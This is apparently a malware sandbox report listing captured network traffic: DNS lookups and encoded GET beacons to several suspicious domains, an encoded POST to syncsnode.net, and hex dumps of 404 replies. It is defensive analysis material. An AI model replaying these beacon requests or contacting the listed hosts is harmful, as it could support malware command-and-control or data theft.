Source: global traffic | HTTP traffic detected: GET /u0td/?BHNhDJjp=EpjSVPpO4pF17PlQ3DNgKhd2v7ja1FkLRxKjmJiLsn9eFCahEsp5jtnh1y932jU+ck47tHBUUsolNvMtAutbQ5HDaIUs2x8kIyYJtigiYamWvQ0ME/HlpqSu5UMEi5UFjQ==&KteDo=fX0Hm8kxa HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.93wxd.top | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /vd6t/?BHNhDJjp=XaiJgAiuFnMEtmZURD8Lc3raCMtFBuupNnQYn/g1mG/l0yZG2F7WlL2GsGHsclNHOTCW0P35DR3+uir5yxADGkXKDk67ta12miPg21T/nG4AWXn5T49Yc7XX4Q8eijQzNQ==&KteDo=fX0Hm8kxa HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.meramhaliyikama.xyz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /bk4m/?BHNhDJjp=9ev+IdmnT8REph2CGzrIJ/IsR1IBIoPEgwjA7hGEn4o4y1K06O5g5/jYrWQAF7mhR86KKy+6wQgfy24A0MXqjVprhsrq1Iq/McMaN4BLomsWsjrPI4172Mamgtp349unMg==&KteDo=fX0Hm8kxa HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.n-paylity.shop | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /ksch/?BHNhDJjp=J8lzQYDSDIyYjxmyisycdc0dQo+0mdR+IGXfAda7tEE7fn+2GVkWw6+hdf3A0BNElIx5K3urdoerlkCH3feHlz5JfFADuLqaJ1HoxSfDOrbKFf5fEpK5Atk4IzSpx3Ij7g==&KteDo=fX0Hm8kxa HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.supox.site | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /886f/?KteDo=fX0Hm8kxa&BHNhDJjp=F4WdUfqIHBg/HL3skErP7lPVDvUzs0Cr8ZA+Fg9dI3ceouFLqqnQf6dPVZvR/nKMPYrd+0qk5jIF7ORmEYYYOZXDdPSYgHhA7DdWNhIxJ8KzsbpvOzugz6Mfni67awxMIw== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.5711337.xyz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.wcr5.top
Source: global traffic | DNS traffic detected: DNS query: www.syncsnode.net
Source: global traffic | DNS traffic detected: DNS query: www.facaicloud.top
Source: global traffic | DNS traffic detected: DNS query: www.nibcorp.xyz
Source: global traffic | DNS traffic detected: DNS query: www.93wxd.top
Source: global traffic | DNS traffic detected: DNS query: www.meramhaliyikama.xyz
Source: global traffic | DNS traffic detected: DNS query: www.n-paylity.shop
Source: global traffic | DNS traffic detected: DNS query: www.supox.site
Source: global traffic | DNS traffic detected: DNS query: www.5711337.xyz
Source: global traffic | DNS traffic detected: DNS query: www.master7.space
Source: unknown | HTTP traffic detected: POST /t97r/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Host: www.syncsnode.net | Origin: http://www.syncsnode.net | Referer: http://www.syncsnode.net/t97r/ | Content-Length: 209 | Content-Type: application/x-www-form-urlencoded | Cache-Control: no-cache | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36 | Data Raw: 42 48 4e 68 44 4a 6a 70 3d 53 57 53 63 79 41 44 42 63 4c 44 5a 64 36 65 66 2b 47 69 2f 43 4f 58 73 38 70 6c 4c 4a 44 50 48 33 35 34 4c 74 36 49 74 51 4f 34 66 69 49 30 6a 43 68 30 6f 4c 48 6c 38 4e 56 43 68 5a 6b 30 73 44 41 73 70 4d 32 62 43 48 6d 72 59 69 6f 67 72 6c 76 68 45 4a 73 44 50 51 66 56 51 52 54 4d 4d 71 4a 44 45 6c 48 4b 78 72 77 41 47 2b 52 71 41 6d 6c 6a 37 51 47 70 66 73 33 4d 79 59 66 67 4d 4e 59 56 49 63 4e 57 56 31 4e 34 30 37 72 57 6a 6b 44 6f 49 63 2f 49 55 49 39 66 6f 66 32 59 36 2f 37 62 33 71 36 6b 59 47 36 36 5a 68 43 4d 32 42 67 39 4f 33 6d 4b 6d 68 56 31 52 5a 58 53 31 68 4c 35 71 52 4b 77 3d | Data Ascii: BHNhDJjp=SWScyADBcLDZd6ef+Gi/COXs8plLJDPH354Lt6ItQO4fiI0jCh0oLHl8NVChZk0sDAspM2bCHmrYiogrlvhEJsDPQfVQRTMMqJDElHKxrwAG+RqAmlj7QGpfs3MyYfgMNYVIcNWV1N407rWjkDoIc/IUI9fof2Y6/7b3q6kYG66ZhCM2Bg9O3mKmhV1RZXS1hL5qRKw=
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 11 Oct 2024 13:09:26 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a87b7e-94" | Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 11 Oct 2024 13:09:43 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | x-turbo-charged-by: LiteSpeed | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkU0Iri%2FA2obOuL5Skx9aOk9wBsAH1jtOvgEAIjBWi7soU%2Fi%2BtlRT7NaQZ1CnwJWBUau9QgIDCljZeAtRLZCvSzkQmOtig76YHjToEeax4klazQzyNwseG6ssIRVyPw0nki0Xg%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8d0f1611b9478c7d-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 
0c 1d c2 10 ff 00 59 60 a5 03 04 f4 13 fa 37 4d e6 da 55 93 49 3d b5 0f eb 33 48 2f f4 dc 0c 79 9c 2f b2 dc ba 53 fd 90 fe c2 90 13 52 6a 3b 56 b1 14 62 98 70 3d d4 8f 00 7b 34 82 f5 84 75 6f 50 f8 aa 23 56 f5 13 a7 8f f6 96 cc d3 22 2f dc a9 fe a5 52 6e ca df e3 ac 3b f2 12 fd a2 0a 85 3b 41 20 a3 25 f8 b1 Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:09:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhcv0QSTuFkwz8VSce9PuNag8PzZG09W8PLiPGo2ELJ9BaqMNGec36dDVkH3WaXfMqYwzwhoKK68CvkXx5lOJMSEnt3feDXexfWyR09uIqZoyOVgYqM%2BRQEhPCjiofGJYnl3zQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0f16219ca02394-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 
1d c2 10 ff 00 59 60 a5 03 04 f4 13 fa 37 4d e6 da 55 93 49 3d b5 0f eb 33 48 2f f4 dc 0c 79 9c 2f b2 dc ba 53 fd 90 fe c2 90 13 52 6a 3b 56 b1 14 62 98 70 3d d4 8f 00 7b 34 82 f5 84 75 6f 50 f8 aa 23 56 f5 13 a7 8f f6 96 cc d3 22 2f dc a9 fe a5 52 6e ca df e3 ac 3b f2 12 fd a2 0a 85 3b 41 20 a3 25 f8 b1 13 ef f2 f5 Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:09:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANaOv9XQTsyoFef80Srr98h8tnv5IEidnHrfJyXerFhjMAMr%2BGjWYXCuW2tcmwHSVVBFU2Hp%2B%2FXt60%2FjLOBmjae7J55Nx6c4yybP6iZAo%2BHl4MfOAZlnsG6VtaHQkvzdPD%2FSmw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0f16317e2b0cc0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 
04 4b 0c 1d c2 10 ff 00 59 60 a5 03 04 f4 13 fa 37 4d e6 da 55 93 49 3d b5 0f eb 33 48 2f f4 dc 0c 79 9c 2f b2 dc ba 53 fd 90 fe c2 90 13 52 6a 3b 56 b1 14 62 98 70 3d d4 8f 00 7b 34 82 f5 84 75 6f 50 f8 aa 23 56 f5 13 a7 8f f6 96 cc d3 22 2f dc a9 fe a5 52 6e ca df e3 ac 3b f2 12 fd a2 0a 85 3b Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:09:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lal2CfZ5zm7NZgWlogiN555ysaYl6I77Px0eouK%2FlNhXpDJfybchTpxGH6c0s72ZcnH2fYn%2Bnq6LvptKDzJar2WBaiFqSc6GB3DUxZoVT4YdBY%2FN3xYfeg%2FOOT4Iv0H%2BJCS3yQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d0f1641c94318bc-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 
69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 11 Oct 2024 13:09:57 GMTContent-Encoding: gzipData Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 7c 3e 4e da 9c 8c db 66 6c 6e a9 a9 85 ca d1 45 e4 af 53 47 43 95 b7 d5 46 4a 92 a0 26 04 f8 4b 8e 11 90 84 3d 61 7e f6 c0 4c 00 51 29 6a 45 84 83 d6 e6 28 79 8d 29 73 61 3b 49 0f 39 aa 3c d6 d8 fc 7d 63 9d a8 0e be 15 71 c6 a7 71 2e 69 75 da fa a1 d7 8a f8 71 9c e0 d5 9b f3 30 4f 7e 42 b7 70 9e f7 12 8e 69 0e 13 30 6b 6d 38 18 62 52 bb ee ba 3d b2 5a 0a 3e ae 21 4e 82 15 3f 20 47 77 cb 6e a2 c8 8e 72 2e 54 ed fb 86 16 6f 3c 4e 7a 8d 81 1c ec 1d 89 aa fe 9f 0e 2d 58 4b eb 29 ee 03 4a 8b 87 29 4a ff 4e d5 df 97 22 1b dc b0 22 3b ed b3 22 5c b0 c1 d2 e0 62 8b 98 a4 d6 96 38 f4 ba 9f 9b b3 66 0d 26 73 b0 32 e2 b2 1a 84 87 86 5c 98 83 cb fd fc be 27 15 23 32 1f 32 58 77 97 28 2f ea 60 14 
f9 97 f8 d8 85 c5 dc 2b 32 81 7f 5c 94 13 59 fa 5f 2f 49 53 fe 24 80 d7 24 ee ff df e2 2a 2f 73 10 06 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 11 Oct 2024 13:09:59 GMTContent-Encoding: gzipData Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 7c 3e 4e da 9c 8c db 66 6c 6e a9 a9 85 ca d1 45 e4 af 53 47 43 95 b7 d5 46 4a 92 a0 26 04 f8 4b 8e 11 90 84 3d 61 7e f6 c0 4c 00 51 29 6a 45 84 83 d6 e6 28 79 8d 29 73 61 3b 49 0f 39 aa 3c d6 d8 fc 7d 63 9d a8 0e be 15 71 c6 a7 71 2e 69 75 da fa a1 d7 8a f8 71 9c e0 d5 9b f3 30 4f 7e 42 b7 70 9e f7 12 8e 69 0e 13 30 6b 6d 38 18 62 52 bb ee ba 3d b2 5a 0a 3e ae 21 4e 82 15 3f 20 47 77 cb 6e a2 c8 8e 72 2e 54 ed fb 86 16 6f 3c 4e 7a 8d 81 1c ec 1d 89 aa fe 9f 0e 2d 58 4b eb 29 ee 03 4a 8b 87 29 4a ff 4e d5 df 97 22 1b dc b0 22 3b ed b3 22 5c b0 c1 d2 e0 62 8b 98 a4 d6 96 38 f4 ba 9f 9b b3 66 0d 26 73 b0 32 e2 b2 1a 84 87 86 5c 98 83 cb fd fc be 27 15 23 32 1f 32 58 77 97 28 2f ea 60 14 
